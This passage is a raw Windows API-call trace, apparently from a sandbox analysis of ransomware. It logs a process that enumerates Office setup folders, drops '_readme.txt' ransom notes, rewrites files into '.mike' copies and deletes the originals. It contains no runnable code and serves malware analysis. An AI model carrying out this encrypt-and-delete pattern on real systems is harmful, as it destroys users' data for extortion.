files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 1 [0052.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.638] GetFileType (hFile=0x288) returned 0x1 [0052.638] GetFileType (hFile=0x288) returned 0x1 [0052.641] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.641] GetFileType (hFile=0x288) returned 0x1 [0052.641] GetFileType (hFile=0x288) returned 0x1 [0052.641] CloseHandle (hObject=0x288) returned 1 [0052.641] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.642] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.642] GetFileType (hFile=0x288) returned 0x1 [0052.642] GetFileType (hFile=0x288) returned 0x1 [0052.642] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.643] GetFileType (hFile=0x288) returned 0x1 [0052.643] GetFileType (hFile=0x288) returned 0x1 [0052.643] ReadFile (in: hFile=0x288, lpBuffer=0x22372d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22372d8*, lpNumberOfBytesRead=0x2af038*=0x73c, lpOverlapped=0x0) returned 1 [0052.645] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.645] GetFileType (hFile=0x288) returned 0x1 [0052.645] GetFileType (hFile=0x288) returned 0x1 [0052.645] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.645] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.645] GetFileType (hFile=0x288) returned 0x1 [0052.645] GetFileType (hFile=0x288) returned 0x1 [0052.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.647] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 1 [0052.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.648] GetFileType (hFile=0x288) returned 0x1 [0052.648] GetFileType (hFile=0x288) returned 0x1 [0052.649] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8abb880, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8abb880, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.649] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a95720, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a95720, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a95720, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.XML.mike", cAlternateFileName="INFOPA~1.MIK")) returned 1 [0052.650] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8abb880, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8abb880, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8abb880, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x960, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.650] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8abb880, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8abb880, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8abb880, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.650] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8abb880, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8abb880, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8abb880, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.650] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.650] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.650] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.650] CoTaskMemFree (pv=0x502980) [0052.652] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.652] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9fff00, ftCreationTime.dwHighDateTime=0x1cba028, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e9fff00, ftLastWriteTime.dwHighDateTime=0x1cba028, nFileSizeHigh=0x0, nFileSizeLow=0x3b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRANDING.DLL", cAlternateFileName="")) returned 1 [0052.652] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x470e1800, ftCreationTime.dwHighDateTime=0x1caccea, ftLastAccessTime.dwLowDateTime=0x15334ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x470e1800, ftLastWriteTime.dwHighDateTime=0x1caccea, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRANDING.XML", cAlternateFileName="")) returned 1 [0052.652] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4114ea00, ftCreationTime.dwHighDateTime=0x1ca6af2, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x4114ea00, ftLastWriteTime.dwHighDateTime=0x1ca6af2, nFileSizeHigh=0x0, nFileSizeLow=0x11644, dwReserved0=0x0, dwReserved1=0x0, cFileName="OCT.CHM", cAlternateFileName="")) returned 1 [0052.652] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7c27050, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0052.652] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf2b422b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.XML", cAlternateFileName="OFFICE~2.XML")) returned 1 [0052.653] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSETUPUI.DLL", cAlternateFileName="")) returned 1 [0052.653] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4804a00, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd4804a00, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x3d90, dwReserved0=0x0, dwReserved1=0x0, cFileName="promointl.dll", cAlternateFileName="PROMOI~1.DLL")) returned 1 [0052.653] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0b6300, ftCreationTime.dwHighDateTime=0x1ca9107, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2d0b6300, ftLastWriteTime.dwHighDateTime=0x1ca9107, nFileSizeHigh=0x0, nFileSizeLow=0x9339, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSCONFIG.CHM", cAlternateFileName="")) returned 1 [0052.653] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a8bce00, ftCreationTime.dwHighDateTime=0x1ca910f, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7a8bce00, ftLastWriteTime.dwHighDateTime=0x1ca910f, nFileSizeHigh=0x0, nFileSizeLow=0x6931, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSS10O.CHM", cAlternateFileName="")) returned 1 [0052.653] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d4800, ftCreationTime.dwHighDateTime=0x1ca910f, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa7d4800, ftLastWriteTime.dwHighDateTime=0x1ca910f, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSS10R.CHM", cAlternateFileName="")) returned 1 [0052.653] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49087c00, ftCreationTime.dwHighDateTime=0x1ca95c1, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x49087c00, ftLastWriteTime.dwHighDateTime=0x1ca95c1, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.CHM", cAlternateFileName="")) returned 1 [0052.653] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8728670, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf2b422b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.653] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.654] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.658] GetFileType (hFile=0x288) returned 0x1 [0052.658] GetFileType (hFile=0x288) returned 0x1 [0052.658] CloseHandle (hObject=0x288) returned 1 [0052.658] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.659] GetFileType (hFile=0x288) returned 0x1 [0052.659] GetFileType (hFile=0x288) returned 0x1 [0052.659] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.660] GetFileType (hFile=0x288) returned 0x1 [0052.660] GetFileType (hFile=0x288) returned 0x1 [0052.660] ReadFile (in: hFile=0x288, lpBuffer=0x224fa78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x224fa78*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.663] GetFileType (hFile=0x288) returned 0x1 [0052.663] GetFileType (hFile=0x288) returned 0x1 [0052.663] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.663] GetFileType (hFile=0x288) returned 0x1 [0052.664] GetFileType (hFile=0x288) returned 0x1 [0052.664] ReadFile (in: hFile=0x288, lpBuffer=0x225cac8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x225cac8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.664] GetFileType (hFile=0x288) returned 0x1 [0052.664] GetFileType (hFile=0x288) returned 0x1 [0052.664] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2a20 [0052.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.665] GetFileType (hFile=0x288) returned 0x1 [0052.665] GetFileType (hFile=0x288) returned 0x1 [0052.665] ReadFile (in: hFile=0x288, lpBuffer=0x2269b18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2269b18*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.665] GetFileType (hFile=0x288) returned 0x1 [0052.665] GetFileType (hFile=0x288) returned 0x1 [0052.665] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x5220 [0052.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.666] GetFileType (hFile=0x288) returned 0x1 [0052.666] GetFileType (hFile=0x288) returned 0x1 [0052.666] ReadFile (in: hFile=0x288, lpBuffer=0x2276b68, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2276b68*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.666] GetFileType (hFile=0x288) returned 0x1 [0052.666] GetFileType (hFile=0x288) returned 0x1 [0052.666] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x7a20 [0052.667] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.667] GetFileType (hFile=0x288) returned 0x1 [0052.667] GetFileType (hFile=0x288) returned 0x1 [0052.667] ReadFile (in: hFile=0x288, lpBuffer=0x2283bb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2283bb8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.667] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.667] GetFileType (hFile=0x288) returned 0x1 [0052.667] GetFileType (hFile=0x288) returned 0x1 [0052.668] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0xa220 [0052.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.668] GetFileType (hFile=0x288) returned 0x1 [0052.668] GetFileType (hFile=0x288) returned 0x1 [0052.668] ReadFile (in: hFile=0x288, lpBuffer=0x2290c08, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2290c08*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.669] GetFileType (hFile=0x288) returned 0x1 [0052.669] GetFileType (hFile=0x288) returned 0x1 [0052.669] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0xca20 [0052.669] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.669] GetFileType (hFile=0x288) 